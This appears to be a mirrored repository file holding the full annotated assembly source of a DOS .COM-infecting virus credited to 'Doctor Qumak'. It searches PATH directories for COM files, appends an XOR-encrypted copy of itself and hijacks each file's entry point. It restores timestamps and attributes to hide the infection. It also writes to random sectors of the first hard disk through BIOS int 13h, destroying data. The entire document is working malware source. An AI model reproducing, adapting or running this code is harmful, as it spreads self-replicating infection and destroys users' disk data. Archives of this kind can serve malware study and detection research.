mirror of
synced 2025-02-11 17:32:03 +00:00
533 lines
18 KiB
533 lines
18 KiB
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seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
start: jmp l_02F3 ;0100 E9 01F0
db 6Bh,73h,0CAh,0Eh ;contamination ptr ;0103 6B 73 CA 0E
org 2F3h
l_02F3: push cx ;02F3 51
mov dx,offset d_0683 ;coded virus part addr ;02F4 BA 0683
nop ;02F7 90
;<--------- encoding
push dx ;02F8 52
pop bx ;02F9 5B
mov cx,0F9h ;coded block length ;02FA B9 00F9
mov si,dx ;02FD 8B F2
dec si ;02FF 4E
mov dl,[si] ;0300 8A 14
inc si ;0302 46
l_0303: mov al,[bx] ;encoding loop ;0303 8A 07
xor al,dl ;0305 32 C2
nop ;0307 90
mov [bx],al ;0308 88 07
inc bx ;030A 43
loop l_0303 ;030B E2 F6
mov dx,si ;030D 8B D6
;<----- restore changed bytes
xor ax,ax ;030F 33 C0
xor bx,bx ;0311 33 DB
cld ;0313 FC
mov si,dx ;0314 8B F2
add si,0ADh ;x_00AD ;saved bytes address ;0316 .81 C6 00AD
mov di,100h ;target address ;031A .BF 0100
mov cx,7 ;changed bytes ;031D B9 0007
nop ;0320 90
rep movsb ;0321 F3/ A4
mov si,dx ;0323 8B F2
mov byte ptr ds:[si+0F8h],0 ;x_00F8 ;0325 C6 84 00F8 00
mov ah,30h ;get DOS version nr ;032A B4 30
int 21h ;032C CD 21
cmp al,0 ;major version ;032E 3C 00
nop ;0330 90
jnz l_0335 ;0331 75 02
nop ;0333 90
nop ;0334 90
l_0335: mov bp,0BFh ;x_00BF ;0335 BD 00BF
add bp,si ;0338 03 EE
mov byte ptr ds:[bp],0 ;033A 3E: C6 46 00 00
push es ;033F 06
nop ;0340 90
mov ah,2Fh ;get DTA ptr into es:bx ;0341 B4 2F
int 21h ;0343 CD 21
mov [si],bx ;x_0000 ;0345 89 1C
mov [si+2],es ;x_0002 ;0347 8C 44 02
pop es ;034A 07
mov dx,5Fh ;x_005F ;034B .BA 005F
add dx,si ;034E 03 D6
mov ah,1Ah ;set DTA to ds:dx ;0350 B4 1A
int 21h ;0352 CD 21
push es ;0354 06
push si ;0355 56
mov es,ds:[2Ch] ;environment segment ;0356 8E 06 002C
mov di,0 ;035A .BF 0000
l_035D: pop si ;035D 5E
push si ;035E 56
add si,1Ah ;x_001A ('PATH=') ;035F 83 C6 1A
lodsb ;0362 AC
mov cx,8000h ;0363 B9 8000
repne scasb ;0366 F2/ AE
mov cx,4 ;0368 B9 0004
l_036B: lodsb ;036B AC
scasb ;036C AE
jnz l_035D ;036D 75 EE
loop l_036B ;036F E2 FA
;<----- Environment variable 'PATH='
pop si ;0371 5E
pop es ;0372 07
mov [si+16h],di ;x_0016 ;0373 89 7C 16
mov di,si ;0376 8B FE
add di,1Fh ;x_001F = work buffer ;0378 83 C7 1F
mov bx,si ;037B 8B DE
add si,1Fh ;x_001F = work buffer ;037D 83 C6 1F
mov di,si ;0380 8B FE
jmp short l_03CE ;0382 EB 4A
;<----- next directory
l_0384: cmp word ptr [si+16h],0 ;x_0016 = ptr in env ;0384 83 7C 16 00
jne l_0392 ;-> not all in 'PATH' ;0388 75 08
mov byte ptr ds:[si+0F8h],1 ;<- end of 'PATH' ;038A C6 84 00F8 01
jmp l_04E9 ;038F E9 0157
l_0392: push ds ;0392 1E
push si ;0393 56
mov bp,0BFh ;x_00BF ;0394 .BD 00BF
add bp,si ;0397 03 EE
mov ds,es:[02Ch] ;environment segment ;0399 26: 8E 1E 002C
mov di,si ;039E 8B FE
mov si,es:[di+16h] ;ptr in environment ;03A0 26: 8B 75 16
add di,1Fh ;pattern address ;03A4 83 C7 1F
l_03A7: lodsb ;03A7 AC
cmp al,';' ;directory delimiter ;03A8 3C 3B
je l_03BB ;03AA 74 0F
cmp al,0 ;03AC 3C 00
je l_03B8 ;position delimiter ;03AE 74 08
mov es:[bp],al ;03B0 26: 88 46 00
inc bp ;03B4 45
stosb ;03B5 AA
jmp short l_03A7 ;03B6 EB EF
l_03B8: mov si,0 ;end of path ptr ;03B8 .BE 0000
l_03BB: pop bx ;03BB 5B
pop ds ;03BC 1F
mov [bx+16h],si ;save current ptr ;03BD 89 77 16
cmp byte ptr [di-1],'\' ;last path char ;03C0 80 7D FF 5C
je l_03CE ;-> o.k. ;03C4 74 08
mov al,'\' ;<- add dir delimiter ;03C6 B0 5C
mov es:[bp],al ;03C8 26: 88 46 00
inc bp ;03CC 45
stosb ;03CD AA
l_03CE: mov byte ptr es:[bp],0 ;x_00BF ;03CE 26: C6 46 00 00
mov bp,0 ;03D3 BD 0000
mov [bx+18h],di ;[x_0018]:=x_001F ;03D6 89 7F 18
mov si,bx ;offset d_0683 ;03D9 8B F3
add si,10h ;x_0010 ('*.COM') ;03DB 83 C6 10
mov cx,6 ;03DE B9 0006
rep movsb ;03E1 F3/ A4
mov si,bx ;03E3 8B F3
mov ah,4Eh ;find 1st filenam match @ds:dx ;03E5 B4 4E
mov dx,01Fh ;x_001F (file pattern) ;03E7 .BA 001F
add dx,si ;03EA 03 D6
mov cx,3 ;attribute pattern ;03EC B9 0003
int 21h ;03EF CD 21
jmp short l_0429 ;03F1 EB 36
;<----- next file in the same directory
l_03F3: mov bp,0BFh ;file name address ;03F3 .BD 00BF
add bp,si ;03F6 03 EE
push bp ;03F8 55
mov ax,0 ;03F9 B8 0000
dec bp ;03FC 4D
l_03FD: inc bp ;03FD 45
cmp byte ptr ds:[bp],'\' ;begin of file name ;03FE 3E: 80 7E 00 5C
jne l_0407 ;0403 75 02
mov ax,bp ;possibly here ;0405 8B C5
l_0407: cmp byte ptr ds:[bp],0 ;end of filename ? ;0407 3E: 80 7E 00 00
jne l_03FD ;-> not now ;040C 75 EF
cmp ax,0 ;have been any dir ? ;040E 3D 0000
pop bp ;0411 5D
jnz l_041B ;-> yes ;0412 75 07
mov byte ptr ds:[bp],0 ;<- we are in the root ;0414 3E: C6 46 00 00
jmp short l_0425 ;0419 EB 0A
l_041B: mov bp,ax ;end of path address ;041B 8B E8
mov byte ptr ds:[bp+1],0 ;end ptr ;041D 3E: C6 46 01 00
mov bp,0 ;0422 BD 0000
l_0425: mov ah,4Fh ;find next file match ;0425 B4 4F
int 21h ;0427 CD 21
l_0429: jnc l_042E ;0429 73 03
jmp l_0384 ;-> end of files in current dir ;042B E9 FF56
l_042E: mov bp,0BFh ;x_00BF = victim name ;042E .BD 00BF
add bp,si ;0431 03 EE
dec bp ;0433 4D
l_0434: inc bp ;0434 45
cmp byte ptr ds:[bp],0 ;find end of path ;0435 3E: 80 7E 00 00
jne l_0434 ;043A 75 F8
mov di,bp ;043C 8B FD
mov bp,0 ;043E BD 0000
push si ;0441 56
add si,7Dh ;x_007D - DTA-file name ;0442 83 C6 7D
l_0445: lodsb ;add file name ;0445 AC
stosb ;0446 AA
cmp al,0 ;0447 3C 00
jne l_0445 ;0449 75 FA
pop si ;044B 5E
mov dx,si ;044C 8B D6
add dx,0BFh ;x_00BF = file name ;044E .81 C2 00BF
mov ax,3D00h ;open file R/O ;0452 B8 3D00
int 21h ;0455 CD 21
jnc l_045C ;0457 73 03
jmp l_0384 ;-> error, next dir ;0459 E9 FF28
l_045C: mov bx,ax ;file handle ;045C 8B D8
mov dx,0B8h ;x_00B8 = file buffer ;045E .BA 00B8
add dx,si ;0461 03 D6
mov cx,7 ;bytes to read ;0463 B9 0007
mov ah,3Fh ;read handle ;0466 B4 3F
int 21h ;0468 CD 21
mov ah,3Eh ;close handle ;046A B4 3E
int 21h ;046C CD 21
mov di,0BBh ;4,5,6,7 bytes from file;046E .BF 00BB
add di,si ;0471 03 FE
mov bx,0B4h ;contam. ptr pattern ;0473 .BB 00B4
add bx,si ;0476 03 DE
mov ax,[di] ;0478 8B 05
cmp ax,[bx] ;047A 3B 07
jne l_0489 ;-> not infected yet ;047C 75 0B
mov ax,[di+2] ;047E 8B 45 02
cmp ax,[bx+2] ;0481 3B 47 02
jne l_0489 ;-> not infected yet ;0484 75 03
l_0486: jmp l_03F3 ;-> allready infected ;0486 E9 FF6A
l_0489: cmp word ptr [si+79h],0FA00h ;file size ;0489 81 7C 79 FA00
nop ;048E 90
ja l_0486 ;-> to big ;048F 77 F5
cmp word ptr [si+79h],0Ah ;file size ;0491 83 7C 79 0A
jb l_0486 ;-> to small ;0495 72 EF
mov di,[si+18h] ;678Bh ?? ;0497 8B 7C 18
push si ;049A 56
add si,7Dh ;DTA - file name ;049B 83 C6 7D
l_049E: lodsb ;049E AC
stosb ;049F AA
cmp al,0 ;04A0 3C 00
jne l_049E ;04A2 75 FA
pop si ;04A4 5E
mov ax,4300h ;get file attrb, nam@ds:dx ;04A5 B8 4300
mov dx,01Fh ;file name ;04A8 .BA 001F
push si ;04AB 56
pop si ;04AC 5E
add dx,si ;04AD 03 D6
int 21h ;04AF CD 21
mov [si+8],cx ;save oryginal attributes ;04B1 89 4C 08
mov ax,4301h ;set file attrb, nam@ds:dx ;04B4 B8 4301
and cl,0FEh ;clear R/O ;04B7 80 E1 FE
mov dx,01Fh ;04BA .BA 001F
add dx,si ;04BD 03 D6
int 21h ;04BF CD 21
mov ax,3D02h ;open file R/W ;04C1 B8 3D02
mov dx,01Fh ;file name address ;04C4 .BA 001F
add dx,si ;04C7 03 D6
int 21h ;04C9 CD 21
jnc l_04D0 ;-> O.K. ;04CB 73 03
jmp l_0638 ;-> error ;04CD E9 0168
l_04D0: mov bx,ax ;file handle ;04D0 8B D8
mov ax,5700h ;get file date & time ;04D2 B8 5700
int 21h ; DOS Services ah=function 57h ;04D5 CD 21
mov [si+4],cx ;04D7 89 4C 04
mov [si+6],dx ;04DA 89 54 06
mov ah,2Ch ;get time ;04DD B4 2C
int 21h ;04DF CD 21
and dh,7 ;seconds ;04E1 80 E6 07
jz l_04E9 ;04E4 74 03
jmp l_0572 ;-> contamine ;04E6 E9 0089
;<- end of 'PATH' members
l_04E9: push bx ;04E9 53
push si ;04EA 56
mov ah,8 ;read parameters for drive dl ;04EB B4 08
mov dl,80h ;HDD 0 ;04ED B2 80
int 13h ;04EF CD 13
cmp dl,0 ;nr of fixed disks ;04F1 80 FA 00
je l_0562 ;-> no HDD ;04F4 74 6C
mov al,cl ;04F6 8A C1
and al,3Fh ; '?' ;04F8 24 3F
mov ds:[si+0F4h],al ;04FA 88 84 00F4
mov al,ch ;04FE 8A C5
mov ah,cl ;0500 8A E1
and ah,0C0h ;0502 80 E4 C0
mov cl,6 ;0505 B1 06
shr ah,cl ;0507 D2 EC
mov ds:[si+0F1h],ax ;0509 89 84 00F1
mov ds:[si+0F3h],dh ;050D 88 B4 00F3
l_0511: mov ah,2Ch ; ',' ;0511 B4 2C
int 21h ; DOS Services ah=function 2Ch ;0513 CD 21
; get time, cx=hrs/min, dh=sec
shr dl,1 ;0515 D0 EA
shr dl,1 ;0517 D0 EA
and dl,7 ;0519 80 E2 07
cmp dl,ds:[si+0F3h] ;051C 3A 94 00F3
ja l_0511 ;0520 77 EF
mov ds:[si+0F7h],dl ;0522 88 94 00F7
push ds ;0526 1E
mov ax,0 ;0527 B8 0000
mov ds,ax ;052A 8E D8
mov bx,046Ch ;052C .BB 046C
mov ax,[bx] ;052F 8B 07
mov dx,[bx+2] ;0531 8B 57 02
pop ds ;0534 1F
div word ptr ds:[si+0F1h] ;0535 F7 B4 00F1
l_0539: cmp dx,ds:[si+0F1h] ;0539 3B 94 00F1
jbe l_0543 ;053D 76 04
shr dx,1 ;053F D1 EA
jmp short l_0539 ;0541 EB F6
l_0543: mov ds:[si+0F5h],dx ;0543 89 94 00F5
mov ax,dx ;0547 8B C2
mov dl,80h ;0549 B2 80
mov dh,ds:[si+0F7h] ;054B 8A B4 00F7
mov ch,al ;054F 8A E8
mov cl,6 ;0551 B1 06
shl ah,cl ;0553 D2 E4
mov cl,ah ;0555 8A CC
mov ah,3 ;0557 B4 03
or cl,1 ;0559 80 C9 01
mov al,ds:[si+0F4h] ;055C 8A 84 00F4
int 13h ; Disk dl=drive 0 ah=func 03h ;0560 CD 13
; write sectors from mem es:bx
l_0562: pop si ;0562 5E
pop bx ;0563 5B
cmp byte ptr ds:[si+0F8h],0 ;x_00F8 ;0564 80 BC 00F8 00
je l_056E ;-> O.K. ;0569 74 03
jmp l_0647 ;-> no 'PATH' ;056B E9 00D9
l_056E: jmp l_0628 ;056E E9 00B7
nop ;0571 90
;<----- contamine file
l_0572: mov ah,3Fh ; '?' ;0572 B4 3F
mov cx,7 ;0574 B9 0007
mov dx,0ADh ;0577 .BA 00AD
add dx,si ;057A 03 D6
int 21h ; DOS Services ah=function 3Fh ;057C CD 21
; read file, cx=bytes, to ds:dx
jnc l_0583 ;057E 73 03
jmp l_0628 ;0580 E9 00A5
l_0583: cmp ax,7 ;0583 3D 0007
je l_058B ;0586 74 03
jmp l_0628 ;0588 E9 009D
l_058B: mov ax,4202h ;058B B8 4202
mov cx,0 ;058E B9 0000
mov dx,0 ;0591 BA 0000
int 21h ; DOS Services ah=function 42h ;0594 CD 21
; move file ptr, cx,dx=offset
jnc l_059B ;0596 73 03
jmp l_0628 ;0598 E9 008D
l_059B: mov cx,ax ;059B 8B C8
sub ax,3 ;059D 2D 0003
mov [si+0Eh],ax ;05A0 89 44 0E
add cx,490h ;05A3 81 C1 0490
mov di,si ;05A7 8B FE
sub di,38Eh ;05A9 81 EF 038E
mov [di],cx ;05AD 89 0D
mov ah,40h ; '@' ;05AF B4 40
mov cx,489h ;05B1 B9 0489
mov dx,si ;05B4 8B D6
sub dx,390h ;05B6 81 EA 0390
push dx ;05BA 52
push cx ;05BB 51
push bx ;05BC 53
push ax ;05BD 50
mov ah,2Ch ; ',' ;05BE B4 2C
int 21h ; DOS Services ah=function 2Ch ;05C0 CD 21
; get time, cx=hrs/min, dh=sec
mov dl,cl ;05C2 8A D1
add dl,dh ;05C4 02 D6
add dl,82h ;05C6 80 C2 82
mov [si-1],dl ;05C9 88 54 FF
mov bx,si ;05CC 8B DE
mov cx,0F9h ;05CE B9 00F9
l_05D1: mov al,[bx] ;05D1 8A 07
xor al,dl ;05D3 32 C2
mov [bx],al ;05D5 88 07
inc bx ;05D7 43
loop l_05D1 ;05D8 E2 F7
pop ax ;05DA 58
pop bx ;05DB 5B
pop cx ;05DC 59
pop dx ;05DD 5A
int 21h ; DOS Services ah=function 40h ;05DE CD 21
; write file cx=bytes, to ds:dx
push dx ;05E0 52
push cx ;05E1 51
push bx ;05E2 53
push ax ;05E3 50
mov bx,si ;05E4 8B DE
mov cx,0F9h ;05E6 B9 00F9
mov dl,[si-1] ;05E9 8A 54 FF
l_05EC: mov al,[bx] ;05EC 8A 07
xor al,dl ;05EE 32 C2
nop ;05F0 90
mov [bx],al ;05F1 88 07
inc bx ;05F3 43
loop l_05EC ;05F4 E2 F6
pop ax ;05F6 58
pop bx ;05F7 5B
pop cx ;05F8 59
pop dx ;05F9 5A
jc l_0628 ;05FA 72 2C
cmp ax,489h ;05FC 3D 0489
jne l_0628 ;05FF 75 27
mov ax,4200h ;0601 B8 4200
nop ;0604 90
mov cx,0 ;0605 B9 0000
mov dx,0 ;0608 BA 0000
int 21h ; DOS Services ah=function 42h ;060B CD 21
; move file ptr, cx,dx=offset
jc l_0628 ;060D 72 19
mov ah,40h ; '@' ;060F B4 40
mov cx,3 ;0611 B9 0003
mov dx,si ;0614 8B D6
add dx,0Dh ;0616 83 C2 0D
int 21h ; DOS Services ah=function 40h ;0619 CD 21
; write file cx=bytes, to ds:dx
mov cx,4 ;061B B9 0004
mov dx,si ;061E 8B D6
add dx,0B4h ;0620 .81 C2 00B4
mov ah,40h ; '@' ;0624 B4 40
int 21h ; DOS Services ah=function 40h ;0626 CD 21
; write file cx=bytes, to ds:dx
l_0628: mov dx,[si+6] ;0628 8B 54 06
nop ;062B 90
mov cx,[si+4] ;062C 8B 4C 04
mov ax,5701h ;062F B8 5701
int 21h ; DOS Services ah=function 57h ;0632 CD 21
; get/set file date & time
mov ah,3Eh ; '>' ;0634 B4 3E
int 21h ; DOS Services ah=function 3Eh ;0636 CD 21
; close file, bx=file handle
l_0638: mov ax,4301h ;0638 B8 4301
mov cx,[si+8] ;063B 8B 4C 08
mov dx,01Fh ;063E .BA 001F
nop ;0641 90
add dx,si ;0642 03 D6
nop ;0644 90
int 21h ; DOS Services ah=function 43h ;0645 CD 21
; get/set file attrb, nam@ds:dx
;<----- EXIT
l_0647: push ds ;0647 1E
mov ah,1Ah ;set DTA to ds:dx ;0648 B4 1A
mov dx,[si] ;saved victim DTA ;064A 8B 14
mov ds,[si+2] ;064C 8E 5C 02
int 21h ;064F CD 21
pop ds ;restore registers ;0651 1F
pop cx ;0652 59
xor ax,ax ;0653 33 C0
xor bx,bx ;0655 33 DB
xor dx,dx ;0657 33 D2
xor si,si ;0659 33 F6
nop ;065B 90
mov di,100h ;Victim entry point ;065C .BF 0100
nop ;065F 90
push di ;0660 57
nop ;0661 90
xor di,di ;0662 33 FF
retn ;-> run victim ;0664 C3
db 1,2,3 ;0665 01 02 03
db 1,2,3 ;0668 01 02 03
db 4,5,6 ;066B 04 05 06
db 0Dh,0Ah ;066E 0D 0A
db '(C) DOCTOR QUMAK' ;0670 28 43 29 20 44 4F 43 54
;0678 4F 52 20 51 55 4D 41 4B
db 0Dh,0Ah ;0680 0D 0A
db 0B6h ;klucz kodowania ;0682 B6
d_0683 label byte
x_0000 dw 0080h ;victim DTA offset ;0000 80 00
x_0002 dw 10ABh ;victim DTA segment ;0003 AB 10
x_0004 dw 9BEFh ;victim time stamp ;0004 EF 9B
x_0006 dw 1587h ;victim date stamp ;0006 87 15
x_0008 dw 0020h ;victim attribute ;0008 20 00
db 0E9h,0F9h,00h ;000A E9 F9 00
db 0E9h,0F0h,01h ;000D E9 F0 01
x_0010 db '*.COM',0 ;0010 2A 2E 43 4F 4D 00
x_0016 dw 002Ah ;ptr in environment ;0016 2A 00
x_0018 dw 678Bh ;??? ;0018 8B 67
x_001A db 'PATH=' ;001A 50 41 54 48 3D
x_001F db 'CS.COM',0 ;001F 43 53 2E 43 4F 4D 00
db '.COM', 0 ;0026 2E 43 4F 4D 00
db 'T.COM', 0 ;002B 54 2E 43 4F 4D 00
db 'OM',0 ;0031 4F 4D 00
db 43 dup (' ') ;0034 002B[20]
;<----- virus DTA
x_005F db 04h ;005F 04
db '????????COM' ;0060 0008[3F] 43 4F 4D
db 03h,14h,00h,51h,01h,00h,00h,00h,00h ;006B 03 14 00 51 01 00 00 00 00
x_0074 db 20h ;attribute found ;0074 20
x_0075 dw 9BEFh ;time stamp ;0075 EF 9B
x_0077 dw 1587h ;date stamp ;0077 87 15
x_0079 dw 01F3h,0 ;file size ;0079 F3 01 00 00
x_007D db 'CS.COM',0,' COM',0,0 ;file name ;007D 43 53 2E 43 4F 4D 00 20 43 4F 4D 00 00
db 0EAh,0F0h ;008A EA F0
db 0FFh, 00h,0F0h ;008C FF 00 F0
db 'Hello world from my virus !',0Dh,0Ah,'$' ;008F 48 65 6C 6C 6F 20
;0095 77 6F 72 6C 64 20
;009B 66 72 6F 6D 20 6D
;00A1 79 20 76 69 72 75
;00A7 73 20 21 0D 0A 24
;<----- Saved victim bytes
x_00AD db 0EBh,00h,1Eh,0B8h,00h,00h,50h ;00AD EB 00 1E B8 00 00 50
;contamination pattern
x_00B4 db 6Bh,73h,0CAh,0Eh ;00B4 6B 73 CA 0E
;<----- file buffer
x_00B8 db 0EBh,00h,1Eh ;00B8 EB 00 1E
x_00BB db 0B8h,00h,00h,50h ;contam.ptr.here ;00BB B8 00 00 50
x_00BF db 'CS.COM',0 ;file name & path ;00BF 43 53 2E 43 4F 4D 00
db '.COM',0 ;00C6 2E 43 4F 4D 00
db 'T.COM', 0 ;00CB 54 2E 43 4F 4D 00
db 'M',0 ;00D1 4D 00
db ' the stuff that should be here' ;00D3 20 74 68 65 20 73
;00D9 74 75 66 66 20 74
;00DF 68 61 74 20 73 68
;00E5 6F 75 6C 64 20 62
;00EB 65 20 68 65 72 65
x_00F1 dw 0 ;00F1 00 00
x_00F3 db 0 ;00F3 00
x_00F4 db 0 ;00F4 00
x_00F5 dw 0 ;00F5 00 00
x_00F7 db 0 ;00F7 00
x_00F8 db 0 ;1=no path ;00F8 00
seg_a ends
end start